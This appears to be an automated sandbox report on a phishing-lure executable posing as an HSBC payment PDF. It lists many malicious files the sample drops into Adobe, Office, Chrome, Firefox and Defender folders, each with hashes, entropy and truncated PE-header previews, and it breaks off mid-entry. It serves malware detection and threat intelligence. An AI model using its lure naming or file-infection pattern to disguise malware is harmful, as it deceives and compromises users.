Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5855744
Entropy (8bit):	6.572130874831671
Encrypted:	false
SSDEEP:	98304:hALuzDKnxCp3JKCrPJzruaI6HMaJTtGbg7wRGpj3:aaGg3cuPIaI6HMaJTtGb8F9
MD5:	2468BD306D774918E3F72B4D5ACEE29B
SHA1:	BCD02AD61F0A1B78843A0276B6F63CEE9EB0AD1A
SHA-256:	B060BD228550350BAB91CB1DBB38B1F9DB45CC59DFC7920EF3C57FFEBDF328FA
SHA-512:	0F67EBB6DFE8064D1B36A8D6A00D3BEA52AD0D003B09ADA0D8C7C219509D48BC09D7F4077B85A9F72AD9D3686FEEE628B2042A05E285DE777A4140F95E14171A
Malicious:	true
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y......Y... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1468416
Entropy (8bit):	4.890069876979152
Encrypted:	false
SSDEEP:	24576:PXr/SVAxWS/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:zNxLLNiXicJFFRGNzj3
MD5:	F6ED5AF1C824B080C1F4AEA3DE7136F1
SHA1:	10AF512BBFF2418F08E75DF55D1B6B5C3AD8A545
SHA-256:	043F0B78954CFB78033102D90838CC4FC1511D76A308794ADDCBF24A4AB28F6B
SHA-512:	B0143D1CBC47D769A221E308AB344EF6090F070F4BF6769D5F1E22F86FB0C018E2D04478D70B2BFDE96D3EC4AEF735C3106CCE09F062671AF4BE7EC8B9EFE536
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................`!......9........... ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27533312
Entropy (8bit):	6.248046378664414
Encrypted:	false
SSDEEP:	196608:0hRrmpGpGdJM7Hbp8JfrCGvqTYuNDmoefAlprtPz25HqaI6HMaJTtGbQOoF9:0hRCpGpMJMrbp8JjpWdNlc5z9
MD5:	156CDF18AA9A483E19F7D21318EB901A
SHA1:	D9B6A927D82F251F19CD201D234C91F70821442A
SHA-256:	4EF8E1D9A804A7BC7D92EFD72FB03453F4C9DA6431D8257B6D70B8ED62991E15
SHA-512:	B0E022BB7DD6550EA1E02BEAD198ABCAB5305035416266B70D5616471202F647A9AAF1A00733DA808FBF579BD55E325C56ADFABC86AC5C892F3AA153BEC02A63
Malicious:	true
Preview:	MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.\|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@......................................... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2199552
Entropy (8bit):	6.782215283994445
Encrypted:	false
SSDEEP:	49152:W83pZ3kd0CuEeN0LUmRXbYs65mULNiXicJFFRGNzj3:KKuUMY15H7wRGpj3
MD5:	1D6E62F362CB02B74B7986EEBBD0FC09
SHA1:	42DB7718ABEC70495122FE00FFF59AE6BB8E9BE0
SHA-256:	02CCD463BE4E0948FDDFADF65E0ECBB3DDD19EFEED93FF940BC8936E7F33D760
SHA-512:	F2184FFF3EAF7F24F24FCB63B1796E104F45A5B31437C313B748EED877EBD9BA4D37D1F438B9253CCFB7B57946A0DF523ADF084A734C6219B53C5B0FE5BD36A9
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!.....#*"... .......... ......................................P...\|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4971008
Entropy (8bit):	6.668190330102286
Encrypted:	false
SSDEEP:	49152:cErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGO8ndOPcptz6+Mi:KA4oGlcR+glpdOPKzgVZy7wRGpj3
MD5:	0AE57F1C3C5418A1533ECE199E4DC507
SHA1:	8AF6AE62970562DAED085674B208247452FCCE1D
SHA-256:	6948F9848773BB4376BAABA82A86C232A8C0EE024C64FFA9634BEC04EB9A0846
SHA-512:	9E236A0B23D9B4FFF0E69D6ABAF7088D5A2B5E2D3F5DE42D49F553E967DCAF547C719D82BF766C04EC6816A01A68DD2CBC6731C519424B17D8407F3C1BC041E9
Malicious:	true
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L.....^PL... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4897792
Entropy (8bit):	6.827351177478831
Encrypted:	false
SSDEEP:	49152:P8ErDqTGsitHloGgkiDrCvJVZfEcpwD0YLgVCM2hnwLNwiHaGI3Y/685ZYMaWgKs:Ev2gM+qwtLg7pPgw/DSZ9x7wRGpj3
MD5:	309B6B225384BC626652B3F04B426BD4
SHA1:	5F5C7B54B614202E37104C6A42C7320A94384391
SHA-256:	7AABC60C21837E26E01396CE2A3EA7D41CCCB523C3B8911CD7B36D0FAB7230AB
SHA-512:	BD7A572122DB1B235CBDD8699C55FB69D4E4A862AFF693DB394E05A9D7E31A689AE36D7D6278834DB60529A55E92C237AA4CC210AF80A9784416CDC228C1AC62
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......D/......... ..........@..............................L.....IzK... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4897792
Entropy (8bit):	6.827347087665873
Encrypted:	false
SSDEEP:	49152:Q8ErDqTGsitHloGgkiDrCvJVZfEcpwD0YLgVCM2hnwLNwiHaGI3Y/685ZYMaWgKs:Vv2gM+qwtLg7pPgw/DSZ9x7wRGpj3
MD5:	574D35DD37BCAE8492CFED312146AF8F
SHA1:	5E3EE5BA930F7C45858C297DFFAA446AA4E1C071
SHA-256:	748B46646E1B7E88D4EAAF643D6A131EA92318B444D80D9EB8D08C2AF2A4DC69
SHA-512:	9F0CBA1A6A601F550F06604787780BAC9555FBDA26804B4885C113BEA8D1AF2825B03897B0A8C02225EB5556CE6ED60FCCC4A1B3D31BFB0D9C728872598A83F3
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......D/......... ..........@..............................L.....G.J... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2156544
Entropy (8bit):	6.947508453340039
Encrypted:	false
SSDEEP:	24576:ptjqL8fHv8aUbp8D/8+xQWAT/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:LjKKv81FI/85RLNiXicJFFRGNzj3
MD5:	84AFFE75B180A4490EF4574730A36CC5
SHA1:	EAAE31A97D18F0ED967E0174C2DAF2F5D99A46ED
SHA-256:	AD6E1E4591615905E073729F5E6B03CFB6FF5A37DA19E9B6DF207EBFF65D5F55
SHA-512:	3B41BF7C5AA4B146B3BFD399DBA8DE17E5B5D6110452989FD4EBB8EB34EBDD64316417C9A346C64EA21995349900E4F7AE6B82FBC754607D156D7ADF775ED6BB
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......F.....................@.............................P".....1. ... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe

Download File

Process:	C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2370560
Entropy (8bit):	7.027361809575414
Encrypted:	false
SSDEEP:	49152:DAMsOu3JfCIGcZuTodRFYKBrFxbWpVLNiXicJFFRGNzj3:DAMa3PZuTS+7wRGpj3
MD5:	14DCF2F7EF2A9466F6D269FBA35CC1E4
SHA1:	1F4568964C9BFB768DB0CFECE4298E2686C6F2B3
SHA-256:	0AB0D57A821B3A31E94CA65E1B77E7BAA98DF8BF454B73972BAE13A594A25000
SHA-512:	A8849BC54B73C46E01D35441C73A51FCED45E95EB3559B3913D3F1E63D6D4B190836DB421D237CFE9870792E5B8355567B6D4FF2821AC802B09939E4D6C546B2
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e..........".................0..........@..............................%.....q_$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1984512
Entropy (8bit):	7.098288848468297
Encrypted:	false
SSDEEP:	49152:/SK7Fhsly2EPfOfESLNiXicJFFRGNzj3:aU2cBS7wRGpj3
MD5:	4383AEF705A6F67F463F7DBB1962C715
SHA1:	E5EF93F4E5E8F293EB10473EB848CAEF79C0D9CF
SHA-256:	C061624F60307F85200A5FD89B8B2462753EA58950EFE230A0871F4E14D67676
SHA-512:	8D311AD11E34FF331FA31834BD69CE1D4635E12E0BEFC935BA04977BDBBFBAB92FE8E952B67BD8C4E767DA121C20BEF0E550DB8EA79B35A605D03D029EB00AA5
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."............................@.......................................... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1779712
Entropy (8bit):	7.1513562087468605
Encrypted:	false
SSDEEP:	49152:mv7e0j11mD+/wDfbgLNiXicJFFRGNzj3:UDx1mzg7wRGpj3
MD5:	80112E95FEAC9CFA7096E941282F3E57
SHA1:	D6251876E6D97429910DED292F0ABB7BA86A36FF
SHA-256:	76BB452C673AFD55DDC91E71DB2F97ED241B14778CF102ADDAC5ED8C57F27FD0
SHA-512:	46EF51E65DBD41AD360D8D9F2F7F5CFF810CC88D011515E5098E2B7A5D268BC660BB8DBDBBFA1067F329DB7F34EB5640CCA8A9C77DF68E15E68DD7755817DCAF
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."..........B.................@.......................................... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).........................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.....................@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

C:\Program Files\Mozilla Firefox\crashreporter.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1533952
Entropy (8bit):	4.933082344791346
Encrypted:	false
SSDEEP:	24576:BKhSU/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:BSLNiXicJFFRGNzj3
MD5:	2E4E30AEE6D05AD692515A565AE65D5F
SHA1:	3CACFD48F5B9276DD1C1D8C1FECF2D7466F7B271
SHA-256:	E153D04A95E87D4895C32A313D224E140CE3B8FBC794142BD7D74DE27F83426E
SHA-512:	9C75AE504B0C00B958A27BA5392C4BA6DC0438D4E0153D8EEA910FE63F1385E68A270D52E5E8D17682A477ED43F66943219487C05F3B1D0CF5858728B2102056
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................."........... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...`... ......................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\default-browser-agent.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1286656
Entropy (8bit):	7.213935261497919
Encrypted:	false
SSDEEP:	24576:rsFfc1VyFnTUQn652bO4Hj/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:rsFcInTrJhLNiXicJFFRGNzj3
MD5:	A53E7DA310B651748A98755E2781DF4A
SHA1:	F9FD5D225589EEDBB4443616D5FB725AB2BCF0FB
SHA-256:	7CE4C1234A427657131DEEBEE867328C89DD52CC965D1A1D3C03DD95D1DDF001
SHA-512:	7C5AE3F9856DCF54D0EF792C298CB3A64265B7E32CF4919BB87794DAF0A875B23230D2E6E654E49EB07C6F3B2E3D83842D6F2B7629002567D15505CEE9CD5C48
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@.....................................@.... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\firefox.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1246208
Entropy (8bit):	7.485583499967342
Encrypted:	false
SSDEEP:	24576:ht9j6p4xQbiKI69wpemIwpel9Q/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ht9+aQbtl2peapelGLNiXicJFFRGNzj3
MD5:	20AFEB0ECBA86C2EAA227C13ADECB8B9
SHA1:	F25CC06A16D0CF3A86A8EDA3D0565CBF8ECE0F46
SHA-256:	B178E47DAAFE903690933ADE3D689A28E572C692A85002603AABF9A2D4097F66
SHA-512:	9FAE27C6CEEC286DEEF78BCE402DC524A81AD648E3750D9600CBCFAB42E2F1B3EEB06A2C6955D7C37ADE904BA43631B9946311E3DC79C0748520CCD3E963BE5E
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@......................................... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\maintenanceservice.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1512448
Entropy (8bit):	4.897876967552948
Encrypted:	false
SSDEEP:	24576:gQVTZu0JL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:fVTZu2LNiXicJFFRGNzj3
MD5:	3C7523F53243CA9983B5E638934DD140
SHA1:	D01BC3FBF9AE3EE630E9042FCE76EC12CBC5F14F
SHA-256:	4D04BEC14343906D3C2B781D2EF6F338BF7B96395273528E8680E62F4EFEFE87
SHA-512:	9E689872C1AAE0804FB69985E9C340E3BD7F4217C1C3F3E17742FDE965F3B368632C8B99DDFE919FC531D41CA88CDCBF4556B17B01FF33F973ED2D77B1AEF9DB
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................`"........... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...`...........t..............@...........................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1344000
Entropy (8bit):	6.798382678181936
Encrypted:	false
SSDEEP:	24576:KC1vpgXcZ/zR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:KC1vpIc9RLNiXicJFFRGNzj3
MD5:	428902ECD873B23CC3EC820E0C63EAB6
SHA1:	29BF46BF4B5FA6FD23F1193DF5FE0F79D23BE42F
SHA-256:	EF80409D98D9BF2EFAD579C846276531BD1907438677FF39F02BCD430AD983FA
SHA-512:	2DC2FEF71AA848F258291F982271FFD519D77526365BBFB092B466865820C0CE2DD497728EAEBE18A4FBDE00A431DE1339FD161056A6B21764D0EEACF41DC62E
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@....................................9^.... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\pingsender.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1355776
Entropy (8bit):	4.651125305761073
Encrypted:	false
SSDEEP:	24576:FS9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:SLNiXicJFFRGNzj3
MD5:	51719A403FFC53A95E26E3EB8E825498
SHA1:	CB6B07C75B1998B9EB7B30DBED9193D8B83F1688
SHA-256:	FD1B0E017C82CFC3E2CB59836A47DEF4357B2AF9876129ABC98C577D5E5F178F
SHA-512:	323497DBBAC7ACD5FE65005699E1E1A4D9AE25B9F21901A6001382A66DA84341D1C74B01E7F24A5527B2046DE1AE4EB4B2C4D554E2AEB79D66C58D3FE4819D62
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@....................................R..... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...`...p......................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\plugin-container.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1564160
Entropy (8bit):	5.002303267389366
Encrypted:	false
SSDEEP:	24576:oWDntIfGpb/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:DZIepLNiXicJFFRGNzj3
MD5:	A32A422DA9E99012B9F72C0A5AB1421A
SHA1:	3976D02DE1D95C3C91959F92493C5629E78536F1
SHA-256:	BD8D1D83E9479E7A7141C14FABAA8924897891485639493E8E9010C2C2956601
SHA-512:	14D8FE181F887DEF41A863F0A60DEE5AC9A863E97A6049CD40C24591150ED6957225623043D79097C1FFCAAB86FAC5B140D95F7FA7D708576149638B2AE3297B
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@..............................#.....j..... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...`...........>..............@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\private_browsing.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1340928
Entropy (8bit):	4.61159618393644
Encrypted:	false
SSDEEP:	12288:VIhFiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:wJ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	6949141F08E870B05886553C1D868507
SHA1:	F94C9789E95A3AA7789A20904EF80F1FA01D1935
SHA-256:	CC2F7C2978DCD3C40EF90F97ADFDC742D3E86F4422859F8E8E69D1051A4FBCC8
SHA-512:	0EEB1F9E50E63C4136279736E039B242B2936B8FBE1582594D0D4F75B373D849C17AFF776B93D6386F9F6DE6C620775EFDDF6ECA117659FCD86B90B0B83157A3
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@.......................................... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...`...0......................@...........................................................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\updater.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1687552
Entropy (8bit):	5.015374343610194
Encrypted:	false
SSDEEP:	24576:k8oRswt2ioQ3J+Rg/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:k8oRxoFgLNiXicJFFRGNzj3
MD5:	8B9A20546E1D2B3EF7A9FD6B19B0415F
SHA1:	02ECB19BAD056BB312B55EFDE1E8B20A134B0489
SHA-256:	8B3FBB7FEA6CFEF6BD03B9A8B2495ED58DE3A7B370BC2718C9BBD128D0795296
SHA-512:	F80442BF9C7BD786E17D891AAB2448D4F84D3826CB8DEF259B11DE28D5EFD99EFD3FBE259F52816FDBA6793E1DF6676D9A51A83AD939788684D3707A6ED48CF6
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@..............................%.....^l.... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...`........... ..............@...........................................................................................................................................................................................................................

C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1497600
Entropy (8bit):	4.791098054815706
Encrypted:	false
SSDEEP:	24576:Lf8HQlTMxHwJ07wg/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:LkHQlawJ0rLNiXicJFFRGNzj3
MD5:	AAC380A47C954E2E49BB7A8CE982FE8F
SHA1:	9E6D5F8D9282DA878F1E39310CD3CC6F39402054
SHA-256:	DB558BC4045851BC52843F2D578732832E85C1516D9F9E67E9DFC170C71514CD
SHA-512:	612D617FB48FBD3A012951AC71D6EB48FE1AE851921C4A428A61C7BB46FF404159621C558E9D2989039CF713F692B9001EAF74E82D4067B30913C9D672711E07
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@..............................!........... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...`...........:..............@...................................................................................................................................................................................................................

C:\Program Files\Windows Media Player\wmpnetwk.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1534464
Entropy (8bit):	7.117175489180704
Encrypted:	false
